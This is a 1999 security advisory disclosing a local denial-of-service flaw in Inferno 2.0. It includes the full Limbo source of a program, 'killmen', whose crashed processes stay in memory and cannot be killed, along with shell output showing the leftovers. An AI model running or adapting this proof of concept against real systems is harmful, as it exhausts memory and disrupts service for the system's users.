- J.J.F. / Hackers Team - Security Advisory
        =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  Date: 1/18/1999
  Author: Conde Vampiro
  URL: http://www.jjf.org
  Aplication:
  Operating System: Inferno 2.0 over Windows platform.
                    (It may also affect all other
                    platforms running Inferno.)
  Danger: A user can produce a DoS (Denial of Service) in 
          its own memory.

  -=-=-=-=-=-=-=-=
  Introduction
  -=-=-=-=-=-=-=-=

	A program written in Limbo can produce a denial of service
  consuming all the memory of the computer. Althrough the Inferno's 
  commands to prevent this DoS are not able to stop this attack.

  -=-=-=-=-=-=-=-=
  In Detail
  -=-=-=-=-=-=-=-=

	Using the following program written in Limbo, we can consume all the
  memory of the platform we are running Inferno.

------------ Source Code ---------------------------------------------------

#  
# FILE: killmen.b
# DATE: 11/10/98
# CODER: Conde Vampiro of - J.J.F. / Hackers Team -
# ABSTRACT: A DoS (Denial of service) in Limbo for Inferno O.S
#
# http://www.jjf.org      - J.J.F. / Hackers Team - 

implement killmen;

include "sys.m";
sys: Sys;
include "draw.m";

i : int;
men : con "DoS by Conde Vampiro";
died := array[0] of int; 
kill := array[0] of int;

	killmen: module {
		init: fn(ctxt: ref Draw-> Context, nil: list of string);  	
};

 	init (ctxt: ref Draw-> Context, nil: list of string) {
		sys = load Sys Sys->PATH;
		sys->print("%s\n\n", men); 
		for (i:=0;i<100;i++) {
			died[i]=kill[i];
		}
	}   
  
------------ EOF -------------------------------------------------------------

	If a user execute this program on an Inferno console, it will
  produce the following error:

  colmillo$ killmen
  DoS by Conde Vampiro

  [killmen] Broken: "array bounds error"
  17 "killmen":array bounds error
  colmillo$

	We can observe that the program "killmen" has produce an error and
  the shell tells us it's pid, in this case 17. If we execute the 'ps'
  command, it will show the following result:

  colmillo$ ps
       1        1 Conde Vampiro    release     1K Sh[$Sys]
       6        6    inferno        alt    19K Wm
       7        6    inferno    release     4K Wm[$Sys]
       8        6    inferno    release     4K Wm[$Sys]
      11       10    inferno       recv    16K Plumb
      12       10    inferno        alt    16K Plumb
      13       10    inferno        alt    16K Plumb
      17        1 Conde Vampiro     broken    10K killmen
      18        1 Conde Vampiro      ready     1K Ps[$Sys]
  colmillo$  

	The program "killmen" it's still remainning in memory, althrough it 
  has produce an error. If we execute this program for a while, it will 
  consume all the memory, this can be easely done using Mash, the shell 
  script of Inferno.

	If the administrator has not execute the Inferno window interface 
  or has not done the bind of the 'ps' command to the /prog directory, the 
  "killmen" program will be hidden and the 'ps' will not show the processes 
  in memory, but they are there. 

	The 'slayer' command is used to kill "broken" processes but it will
  not kill "killmen". If we go to /prog directory we can see all the processes
  as files:

  colmillo$ cd /prog
  colmillo$ ls -l
  dr-xr-xr-x p    0 Conde Vampiro Conde Vampiro        0 Jan 18 17:53 1  
  dr-xr-xr-x p    0    inferno Conde Vampiro        0 Jan 18 17:53 11
  dr-xr-xr-x p    0    inferno Conde Vampiro        0 Jan 18 17:53 12
  dr-xr-xr-x p    0    inferno Conde Vampiro        0 Jan 18 17:53 13
  dr-xr-xr-x p    0 Conde Vampiro Conde Vampiro        0 Jan 18 17:53 17
  dr-xr-xr-x p    0 Conde Vampiro Conde Vampiro        0 Jan 18 17:53 22
  dr-xr-xr-x p    0    inferno Conde Vampiro        0 Jan 18 17:53 6
  dr-xr-xr-x p    0    inferno Conde Vampiro        0 Jan 18 17:53 7
  dr-xr-xr-x p    0    inferno Conde Vampiro        0 Jan 18 17:53 8
  colmillo$

	The 17 and 22 processes are the "killmen" program that are in memory 
  and every time the program is executed it will create a new "broken" process
  in memory.

  -=-=-=-=-=-=-=-=
  Byes All
  conde@jjf.org

  http://www.jjf.org
  - J.J.F. / Hackers Team - Security Advisory
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=